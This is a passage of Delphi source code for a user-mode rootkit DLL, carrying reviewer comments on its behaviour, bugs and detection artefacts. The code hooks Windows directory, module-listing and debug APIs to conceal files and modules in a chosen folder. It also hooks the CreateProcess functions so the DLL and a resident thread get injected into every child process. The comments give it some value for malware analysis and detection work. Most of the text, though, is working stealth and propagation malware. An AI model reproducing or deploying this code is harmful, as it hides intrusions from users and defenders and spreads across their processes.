Offset: dword;
Name: string;
LastFileDirectoryInfo, FileDirectoryInfo: PFILE_DIRECTORY_INFORMATION;
LastFileFullDirectoryInfo, FileFullDirectoryInfo: PFILE_FULL_DIRECTORY_INFORMATION;
LastFileBothDirectoryInfo, FileBothDirectoryInfo: PFILE_BOTH_DIRECTORY_INFORMATION;
LastFileNamesInfo, FileNamesInfo: PFILE_NAMES_INFORMATION;
begin
Result := NtQueryDirectoryFileNextHook(FileHandle, Event, ApcRoutine, ApcContext, IoStatusBlock, FileInformation, FileInformationLength, FileInformationClass, ReturnSingleEntry, FileName, RestartScan);
if Result <> 0 then Exit;
Offset := 0;
case dword(FileInformationClass) of
1:
begin
FileDirectoryInfo := nil;
repeat
LastFileDirectoryInfo := FileDirectoryInfo;
FileDirectoryInfo := PFILE_DIRECTORY_INFORMATION(pointer(dword(FileInformation) + Offset));
Name := Copy(WideCharToString(FileDirectoryInfo.FileName), 1, FileDirectoryInfo.FileNameLength div 2);
if StrCmp(Name, Root) then
begin
if FileDirectoryInfo.NextEntryOffset = 0 then
begin
if LastFileDirectoryInfo <> nil then LastFileDirectoryInfo.NextEntryOffset := 0
else Result := NTSTATUS($C000000F);
Exit;
end
else
begin
LastFileDirectoryInfo.NextEntryOffset := LastFileDirectoryInfo.NextEntryOffset + FileDirectoryInfo.NextEntryOffset;
end;
end;
Offset := Offset + FileDirectoryInfo.NextEntryOffset;
until FileDirectoryInfo.NextEntryOffset = 0;
end;
2:
begin
FileFullDirectoryInfo := nil;
repeat
LastFileFullDirectoryInfo := FileFullDirectoryInfo;
FileFullDirectoryInfo := PFILE_FULL_DIRECTORY_INFORMATION(pointer(dword(FileInformation) + Offset));
Name := Copy(WideCharToString(FileFullDirectoryInfo.FileName), 1, FileFullDirectoryInfo.FileNameLength div 2);
if StrCmp(Name, Root) then
begin
if FileFullDirectoryInfo.NextEntryOffset = 0 then
begin
if LastFileFullDirectoryInfo <> nil then LastFileFullDirectoryInfo.NextEntryOffset := 0
else Result := NTSTATUS($C000000F);
Exit;
end
else
begin
LastFileFullDirectoryInfo.NextEntryOffset := LastFileFullDirectoryInfo.NextEntryOffset + FileFullDirectoryInfo.NextEntryOffset;
end;
end;
Offset := Offset + FileFullDirectoryInfo.NextEntryOffset;
until FileFullDirectoryInfo.NextEntryOffset = 0;
end;
3:
begin
FileBothDirectoryInfo := nil;
repeat
LastFileBothDirectoryInfo := FileBothDirectoryInfo;
FileBothDirectoryInfo := PFILE_BOTH_DIRECTORY_INFORMATION(pointer(dword(FileInformation) + Offset));
Name := Copy(WideCharToString(FileBothDirectoryInfo.FileName), 1, FileBothDirectoryInfo.FileNameLength div 2);
if StrCmp(Name, Root) then
begin
if FileBothDirectoryInfo.NextEntryOffset = 0 then
begin
if LastFileBothDirectoryInfo <> nil then LastFileBothDirectoryInfo.NextEntryOffset := 0
else Result := NTSTATUS($C000000F);
Exit;
end
else
begin
LastFileBothDirectoryInfo.NextEntryOffset := LastFileBothDirectoryInfo.NextEntryOffset + FileBothDirectoryInfo.NextEntryOffset;
end;
end;
Offset := Offset + FileBothDirectoryInfo.NextEntryOffset;
until FileBothDirectoryInfo.NextEntryOffset = 0;
end;
12:
begin
FileNamesInfo := nil;
repeat
LastFileNamesInfo := FileNamesInfo;
FileNamesInfo := PFILE_NAMES_INFORMATION(pointer(dword(FileInformation) + Offset));
Name := Copy(WideCharToString(FileNamesInfo.FileName), 1, FileNamesInfo.FileNameLength div 2);
if StrCmp(Name, Root) then
begin
if FileNamesInfo.NextEntryOffset = 0 then
begin
if LastFileNamesInfo <> nil then LastFileNamesInfo.NextEntryOffset := 0
else Result := NTSTATUS($C000000F);
Exit;
end
else
begin
LastFileNamesInfo.NextEntryOffset := LastFileNamesInfo.NextEntryOffset + FileNamesInfo.NextEntryOffset;
end;
end;
Offset := Offset + FileNamesInfo.NextEntryOffset;
until FileNamesInfo.NextEntryOffset = 0;
end;
end;
end;
type
// Author's reconstruction of the undocumented ntdll "debug buffer" layout that
// RtlQueryProcessDebugInformation fills in. The hook below edits the module
// list inside it. NOTE(review): field names, sizes and 32-bit pointer widths
// are not verified against any specific Windows version here; only the fields
// the code actually touches (Count, Modules[], ImageName, ModuleInformation)
// are known to be used.
PDebugModule = ^TDebugModule;
// One entry of the loaded-module list returned in the debug buffer.
TDebugModule = packed record
Reserved: array [0..1] of Cardinal;
Base: Cardinal;
Size: Cardinal;
Flags: Cardinal;
Index: Word;
Unknown: Word;
LoadCount: Word;
ModuleNameOffset: Word;
// Module path as a fixed char array; the hook converts it with string() and
// searches it for '\<Root>\'.
ImageName: array [0..$FF] of Char;
end;
PDebugModuleInformation = ^TDebugModuleInformation;
// Variable-length module list: Count entries follow, declared as a one-element
// open array so Modules[i] can be indexed beyond 0 (range checks must be off).
TDebugModuleInformation = record
Count: Cardinal;
Modules: array [0..0] of TDebugModule;
end;
PDebugBuffer = ^TDebugBuffer;
// Top-level debug buffer; only ModuleInformation is dereferenced by this file.
TDebugBuffer = record
SectionHandle: THandle;
SectionBase: Pointer;
RemoteSectionBase: Pointer;
SectionBaseDelta: Cardinal;
EventPairHandle: THandle;
Unknown: array [0..1] of Cardinal;
RemoteThreadHandle: THandle;
InfoClassMask: Cardinal;
SizeOfInfo: Cardinal;
AllocatedSize: Cardinal;
SectionSize: Cardinal;
ModuleInformation: PDebugModuleInformation;
BackTraceInformation: Pointer;
HeapInformation: Pointer;
LockInformation: Pointer;
Reserved: array [0..7] of Pointer;
end;
// Hook for ntdll!RtlQueryProcessDebugInformation. Calls the original through
// the RtlQueryProcessDebugInformationNextHook trampoline, then removes from the
// returned module list every entry whose ImageName contains the lower-cased
// pattern '\<Root>\' (Root is the folder this DLL conceals; set in EntryPoint).
// hProcess, lpParam, lpBuffer are passed through unchanged.
// Returns the original's status; the list is only edited when that status is 0.
//
// Behaviour as written (left uncorrected; useful as detection artefacts):
// - only the pattern is lower-cased, ImageName is compared as-is, so the match
//   is effectively case-sensitive against a lower-case pattern;
// - a removal copies exactly ONE record (Modules[i+1] over Modules[i]) and then
//   decrements Count; entries after i+1 are not shifted, so the visible list
//   ends up with a duplicated entry and loses its last entry — a mismatch with
//   other module sources (e.g. the PEB loader lists) that can be checked for;
// - when the matching entry is the last one, Modules[i+1] is read past Count.
function RtlQueryProcessDebugInformationHookProc(hProcess: THandle; lpParam: dword; lpBuffer: pointer): dword; stdcall;
var
QDB: PDebugBuffer; // lpBuffer viewed with the TDebugBuffer layout above
DllLoop: word; // index into Modules[]; word width caps it at 65535 entries
begin
Result := RtlQueryProcessDebugInformationNextHook(hProcess, lpParam, lpBuffer);
if Result <> 0 then Exit; // original failed: leave the buffer untouched
if lpBuffer = nil then Exit;
QDB := PDebugBuffer(lpBuffer);
DllLoop := 0;
// Skip buffers whose module block is unreadable (e.g. ModuleInformation is nil
// because the caller did not request module information).
if IsBadReadPtr(@QDB.ModuleInformation.Count, SizeOf(PDebugModule)) then Exit;
if QDB.ModuleInformation.Count = 0 then Exit;
while DllLoop < QDB.ModuleInformation.Count do
begin
if Pos(LowerCase('\' + Root + '\'), string(QDB.ModuleInformation.Modules[DllLoop].ImageName)) <> 0 then
begin
// Overwrite the matching entry with its successor and shrink Count;
// DllLoop is deliberately not advanced so the moved entry is re-examined.
CopyMemory(@QDB.ModuleInformation.Modules[DllLoop], @QDB.ModuleInformation.Modules[DllLoop + 1], SizeOf(QDB.ModuleInformation.Modules[DllLoop]));
QDB.ModuleInformation.Count := QDB.ModuleInformation.Count - 1;
end
else
begin
Inc(DllLoop);
end;
end;
end;
// Hook for psapi!EnumProcessModules. Runs the original through
// EnumProcessModulesNextHook, then deletes from the returned HMODULE array every
// module whose path (via GetModuleFileNameEx on hProcess) contains the
// lower-cased pattern '\<Root>\', compacting the array and reducing the byte
// count written through lpcbNeeded.
// Note: lpcbNeeded is declared Cardinal here although the Win32 export takes an
// LPDWORD; the code re-casts the value to pdword wherever it dereferences it.
// Returns the original's BOOL result; the array is only edited when it is True.
//
// Behaviour as written (left uncorrected):
// - the loop condition is '<=', so the slot one past the last valid handle is
//   also inspected;
// - lpBaseName is not cleared between iterations, so when GetModuleFileNameEx
//   fails the previous iteration's name is tested again;
// - the shift length is derived from cb (caller buffer size), not from the
//   byte count the original actually reported; if cb is smaller than
//   SizeOf(HMODULE)*(PIDLoop+1) the Cardinal subtraction wraps;
// - Dec(PIDLoop) at index 0 wraps to $FFFFFFFF and the following Inc brings it
//   back to 0, which is what makes the "re-examine this slot" logic work.
function EnumProcessModulesHookProc(hProcess: Cardinal; lphModule: pdword; cb: Cardinal; lpcbNeeded: Cardinal): BOOL; stdcall;
var
PID: HMODULE; // current module handle read from lphModule[PIDLoop]
PIDLoop: dword; // index into the HMODULE array
lpBaseName: array [0..MAX_PATH] of char; // path returned by GetModuleFileNameEx
begin
Result := EnumProcessModulesNextHook(hProcess, lphModule, cb, lpcbNeeded);
if Result = False then Exit;
PIDLoop := 0;
while PIDLoop <= pdword(lpcbNeeded)^ div SizeOf(HMODULE) do
begin
PID := pdword(dword(lphModule) + (SizeOf(HMODULE) * PIDLoop))^;
GetModuleFileNameEx(hProcess, PID, @lpBaseName, MAX_PATH);
if Pos(LowerCase('\' + Root + '\'), string(lpBaseName)) <> 0 then
begin
// Shift the remaining handles down by one slot over the matching entry and
// report one handle fewer; the same index is then visited again.
CopyMemory(pdword(dword(lphModule) + (SizeOf(HMODULE) * PIDLoop)), pdword(dword(lphModule) + (SizeOf(HMODULE) * (PIDLoop + 1))), cb - (SizeOf(HMODULE) * (PIDLoop + 1)));
Dec(pdword(lpcbNeeded)^, SizeOf(HMODULE));
Dec(PIDLoop);
end;
Inc(PIDLoop);
end;
end;
// Replacement for shell32!Shell_NotifyIconA. Ignores both parameters, never
// calls the original, and reports success — so any tray-icon add/modify/delete
// request from the hooked process is silently dropped. Not installed by the
// EntryPoint visible in this file.
function Shell_NotifyIconAHookProc(dwMessage: DWORD; lpData: PNotifyIconDataA): BOOL; stdcall;
begin
Result := True;
end;
// Wide-char counterpart of Shell_NotifyIconAHookProc: drops the request without
// calling the original and returns True. Not installed by the EntryPoint
// visible in this file.
function Shell_NotifyIconWHookProc(dwMessage: DWORD; lpData: PNotifyIconDataW): BOOL; stdcall;
begin
Result := True;
end;
// Thread routine that the CreateProcess* hooks below inject into each newly
// created child (see the InjectThread calls). It copies the TMainThreadInfo
// record referenced by lpParameter, then loops forever calling the Sleep
// function pointer stored in that record with a 1000 ms argument. It never
// returns; the thread lives as long as the child process does.
// The body is written in inline asm with no calls into this module's own
// imports — NOTE(review): presumably because the code bytes are copied into a
// foreign process where this DLL's imports are not resolved; confirm against
// InjectThread. It also relies on the pSleep address (taken from the parent's
// kernel32) being valid in the child.
procedure MainThread(lpParameter: pointer); stdcall;
var
MainThreadInfo: TMainThreadInfo;
begin
MainThreadInfo := TMainThreadInfo(lpParameter^);
asm
@noret:
push 1000
call MainThreadInfo.pSleep
jmp @noret
end;
end;
// Hook for kernel32!CreateProcessA. Forces CREATE_SUSPENDED onto the caller's
// creation flags, runs the original through CreateProcessANextHook, injects the
// MainThread routine (with a record holding the parent's kernel32!Sleep
// address) and then this DLL itself (GetCurrentModulePath) into the child, and
// finally resumes the child's main thread. This is how the hooks propagate to
// every descendant process.
// All parameters are forwarded unchanged except dwCreationFlags.
// Returns the original's BOOL result.
//
// Observable side effects: the child is always created suspended and resumed
// by the parent shortly afterwards, even when the caller itself asked for
// CREATE_SUSPENDED (the hook resumes it regardless); a remote thread and a
// library load occur in the child immediately after creation.
// Review note: Result is not checked before injecting, so after a failed
// CreateProcess the uninitialised handles in lpProcessInformation are used.
function CreateProcessAHookProc(lpApplicationName: PAnsiChar; lpCommandLine: PAnsiChar; lpProcessAttributes, lpThreadAttributes: PSecurityAttributes; bInheritHandles: BOOL; dwCreationFlags: DWORD; lpEnvironment: Pointer; lpCurrentDirectory: PAnsiChar; const lpStartupInfo: TStartupInfo; var lpProcessInformation: TProcessInformation): BOOL; stdcall;
var
MainThreadInfo: TMainThreadInfo; // parameter block copied into the child by InjectThread
begin
Result := CreateProcessANextHook(lpApplicationName, lpCommandLine, lpProcessAttributes, lpThreadAttributes, bInheritHandles, dwCreationFlags or CREATE_SUSPENDED, lpEnvironment, lpCurrentDirectory, lpStartupInfo, lpProcessInformation);
MainThreadInfo.pSleep := GetProcAddress(GetModuleHandle('kernel32'), 'Sleep');
InjectThread(lpProcessInformation.hProcess, @MainThread, @MainThreadInfo, SizeOf(TMainThreadInfo), False);
InjectLibrary(lpProcessInformation.hProcess, GetCurrentModulePath);
ResumeThread(lpProcessInformation.hThread);
end;
// Hook for kernel32!CreateProcessW; identical in behaviour to
// CreateProcessAHookProc except for the wide-char parameter types. Forces
// CREATE_SUSPENDED, calls the original via CreateProcessWNextHook, injects
// MainThread and this DLL into the child, then resumes the child's main thread.
// Returns the original's BOOL result.
// Review note: Result is not checked before the injection calls, so on failure
// the uninitialised handles in lpProcessInformation are used.
function CreateProcessWHookProc(lpApplicationName: PWideChar; lpCommandLine: PWideChar; lpProcessAttributes, lpThreadAttributes: PSecurityAttributes; bInheritHandles: BOOL; dwCreationFlags: DWORD; lpEnvironment: Pointer; lpCurrentDirectory: PWideChar; const lpStartupInfo: TStartupInfo; var lpProcessInformation: TProcessInformation): BOOL; stdcall;
var
MainThreadInfo: TMainThreadInfo; // parameter block copied into the child by InjectThread
begin
Result := CreateProcessWNextHook(lpApplicationName, lpCommandLine, lpProcessAttributes, lpThreadAttributes, bInheritHandles, dwCreationFlags or CREATE_SUSPENDED, lpEnvironment, lpCurrentDirectory, lpStartupInfo, lpProcessInformation);
MainThreadInfo.pSleep := GetProcAddress(GetModuleHandle('kernel32'), 'Sleep');
InjectThread(lpProcessInformation.hProcess, @MainThread, @MainThreadInfo, SizeOf(TMainThreadInfo), False);
InjectLibrary(lpProcessInformation.hProcess, GetCurrentModulePath);
ResumeThread(lpProcessInformation.hThread);
end;
// Hook for advapi32!CreateProcessAsUserA. Same propagation pattern as
// CreateProcessAHookProc: forces CREATE_SUSPENDED, calls the original via
// CreateProcessAsUserANextHook, injects MainThread and this DLL into the child,
// then resumes it. hToken and the remaining parameters are forwarded unchanged.
// Returns the original's BOOL result.
// Review note: Result is not checked before the injection calls, so on failure
// the uninitialised handles in lpProcessInformation are used.
function CreateProcessAsUserAHookProc(hToken: THandle; lpApplicationName: PAnsiChar; lpCommandLine: PAnsiChar; lpProcessAttributes: PSecurityAttributes; lpThreadAttributes: PSecurityAttributes; bInheritHandles: BOOL; dwCreationFlags: DWORD; lpEnvironment: Pointer; lpCurrentDirectory: PAnsiChar; const lpStartupInfo: TStartupInfo; var lpProcessInformation: TProcessInformation): BOOL; stdcall;
var
MainThreadInfo: TMainThreadInfo; // parameter block copied into the child by InjectThread
begin
Result := CreateProcessAsUserANextHook(hToken, lpApplicationName, lpCommandLine, lpProcessAttributes, lpThreadAttributes, bInheritHandles, dwCreationFlags or CREATE_SUSPENDED, lpEnvironment, lpCurrentDirectory, lpStartupInfo, lpProcessInformation);
MainThreadInfo.pSleep := GetProcAddress(GetModuleHandle('kernel32'), 'Sleep');
InjectThread(lpProcessInformation.hProcess, @MainThread, @MainThreadInfo, SizeOf(TMainThreadInfo), False);
InjectLibrary(lpProcessInformation.hProcess, GetCurrentModulePath);
ResumeThread(lpProcessInformation.hThread);
end;
// Hook for advapi32!CreateProcessAsUserW; wide-char twin of
// CreateProcessAsUserAHookProc. Forces CREATE_SUSPENDED, calls the original via
// CreateProcessAsUserWNextHook, injects MainThread and this DLL into the child,
// then resumes it. Returns the original's BOOL result.
// Review note: Result is not checked before the injection calls, so on failure
// the uninitialised handles in lpProcessInformation are used.
function CreateProcessAsUserWHookProc(hToken: THandle; lpApplicationName: PWideChar; lpCommandLine: PWideChar; lpProcessAttributes: PSecurityAttributes; lpThreadAttributes: PSecurityAttributes; bInheritHandles: BOOL; dwCreationFlags: DWORD; lpEnvironment: Pointer; lpCurrentDirectory: PWideChar; const lpStartupInfo: TStartupInfo; var lpProcessInformation: TProcessInformation): BOOL; stdcall;
var
MainThreadInfo: TMainThreadInfo; // parameter block copied into the child by InjectThread
begin
Result := CreateProcessAsUserWNextHook(hToken, lpApplicationName, lpCommandLine, lpProcessAttributes, lpThreadAttributes, bInheritHandles, dwCreationFlags or CREATE_SUSPENDED, lpEnvironment, lpCurrentDirectory, lpStartupInfo, lpProcessInformation);
MainThreadInfo.pSleep := GetProcAddress(GetModuleHandle('kernel32'), 'Sleep');
InjectThread(lpProcessInformation.hProcess, @MainThread, @MainThreadInfo, SizeOf(TMainThreadInfo), False);
InjectLibrary(lpProcessInformation.hProcess, GetCurrentModulePath);
ResumeThread(lpProcessInformation.hThread);
end;
// Hook for advapi32!CreateProcessWithLogonW. Same propagation pattern as the
// other CreateProcess* hooks: forces CREATE_SUSPENDED, calls the original via
// CreateProcessWithLogonWNextHook, injects MainThread and this DLL into the
// child, then resumes it. The credential parameters (lpUsername, lpDomain,
// lpPassword, dwLogonFlags) are forwarded unchanged and not inspected here.
// Returns the original's BOOL result.
// Review note: Result is not checked before the injection calls, so on failure
// the uninitialised handles in lpProcessInformation are used.
function CreateProcessWithLogonWHookProc(lpUsername, lpDomain, lpPassword: PWideChar; dwLogonFlags: dword; lpApplicationName: PWideChar; lpCommandLine: PWideChar; dwCreationFlags: DWORD; lpEnvironment: Pointer; lpCurrentDirectory: PWideChar; const lpStartupInfo: tSTARTUPINFO; var lpProcessInformation: TProcessInformation): BOOL; stdcall;
var
MainThreadInfo: TMainThreadInfo; // parameter block copied into the child by InjectThread
begin
Result := CreateProcessWithLogonWNextHook(lpUsername, lpDomain, lpPassword, dwLogonFlags, lpApplicationName, lpCommandLine, dwCreationFlags or CREATE_SUSPENDED, lpEnvironment, lpCurrentDirectory, lpStartupInfo, lpProcessInformation);
MainThreadInfo.pSleep := GetProcAddress(GetModuleHandle('kernel32'), 'Sleep');
InjectThread(lpProcessInformation.hProcess, @MainThread, @MainThreadInfo, SizeOf(TMainThreadInfo), False);
InjectLibrary(lpProcessInformation.hProcess, GetCurrentModulePath);
ResumeThread(lpProcessInformation.hThread);
end;
// DLL notification handler. On DLL_PROCESS_ATTACH it sets the global Root (the
// folder name every hook in this file conceals, obtained from GetFolder), skips
// the current process when IsId says so, and then installs the hooks: each
// HookCode call receives the target export address, the replacement routine
// and the *NextHook variable through which the replacement reaches the
// original. NtEnumerateValueKey is left unhooked inside Explorer
// (IsExplorer). SetPrivilege is called last. Any other Reason is ignored.
// Reason: the DllMain reason code.
// Ntdll, Kernel, Advapi, GetFolder, IsId, IsExplorer, HookCode, SetPrivilege,
// and the NtQuerySystemInformation / NtDeviceIoControlFile /
// NtEnumerateValueKey hook routines are not defined in this excerpt.
// Detection note: HookCode appears to patch the resolved export addresses in
// place (inferred from its arguments; not shown here), so comparing the
// in-memory prologues of these exports with their on-disk images in a hooked
// process should reveal the modification.
procedure EntryPoint(Reason: dword);
begin
if Reason <> DLL_PROCESS_ATTACH then Exit;
Root := GetFolder;
if IsId(GetCurrentProcessId) then Exit; // excluded process: install nothing
HookCode(GetProcAddress(GetModuleHandle(Ntdll), 'NtQuerySystemInformation'), @NtQuerySystemInformationHookProc, @NtQuerySystemInformationNextHook);
HookCode(GetProcAddress(GetModuleHandle(Ntdll), 'NtDeviceIoControlFile'), @NtDeviceIoControlFileHookProc, @NtDeviceIoControlFileNextHook);
HookCode(GetProcAddress(GetModuleHandle(Ntdll), 'NtQueryDirectoryFile'), @NtQueryDirectoryFileHookProc, @NtQueryDirectoryFileNextHook);
HookCode(GetProcAddress(GetModuleHandle(Ntdll), 'RtlQueryProcessDebugInformation'), @RtlQueryProcessDebugInformationHookProc, @RtlQueryProcessDebugInformationNextHook);
HookCode(GetProcAddress(GetModuleHandle(Kernel), 'CreateProcessA'), @CreateProcessAHookProc, @CreateProcessANextHook);
HookCode(GetProcAddress(GetModuleHandle(Kernel), 'CreateProcessW'), @CreateProcessWHookProc, @CreateProcessWNextHook);
HookCode(GetProcAddress(GetModuleHandle(Advapi), 'CreateProcessAsUserA'), @CreateProcessAsUserAHookProc, @CreateProcessAsUserANextHook);
HookCode(GetProcAddress(GetModuleHandle(Advapi), 'CreateProcessAsUserW'), @CreateProcessAsUserWHookProc, @CreateProcessAsUserWNextHook);
HookCode(GetProcAddress(GetModuleHandle(Advapi), 'CreateProcessWithLogonW'), @CreateProcessWithLogonWHookProc, @CreateProcessWithLogonWNextHook);
if not IsExplorer(GetCurrentProcessId) then HookCode(GetProcAddress(GetModuleHandle(Ntdll), 'NtEnumerateValueKey'), @NtEnumerateValueKeyHookProc, @NtEnumerateValueKeyNextHook);
// psapi is loaded on demand here because it may not be mapped yet.
HookCode(GetProcAddress(LoadLibrary('psapi'), 'EnumProcessModules'), @EnumProcessModulesHookProc, @EnumProcessModulesNextHook);
SetPrivilege;
end;
// Library initialisation block. Registers EntryPoint as the DLLProc so later
// attach/detach notifications reach it, runs the attach path immediately for
// the process that loaded this DLL, and then terminates the calling thread.
// NOTE(review): ExitThread here ends whichever thread ran the initialisation —
// presumably the remote thread started by InjectLibrary — while still inside
// the loader's DllMain path; confirm against InjectLibrary.
begin
DLLProc := @EntryPoint;
EntryPoint(DLL_PROCESS_ATTACH);
ExitThread(0);
end.